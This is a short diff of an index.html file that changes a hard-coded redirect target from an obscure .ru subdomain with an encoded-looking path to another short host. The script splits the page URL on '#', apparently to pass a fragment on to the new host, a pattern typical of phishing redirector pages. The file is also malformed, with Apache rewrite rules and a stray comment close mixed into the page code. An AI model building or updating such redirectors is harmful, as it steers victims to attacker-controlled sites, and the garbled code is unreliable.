--- a/index.html
+++ b/index.html
@@ -10,7 +10,7 @@
 RewriteEngine On
 RewriteRule ^[^/]+/try/(.*)$ /try/$1 [L] */
 
-var redirect_url = "https://28c.g06snmu.ru/Y2UuY29t/#1"; // Change this to the URL you want to redirect to
+var redirect_url = "https://s-sse.com/M"; // Change this to the URL you want to redirect to
 var path = window.location.href;  // Get the part of the URL after the domain name
 var parts = path.split('#'); // Split the path by #
 // Check if there is a second part
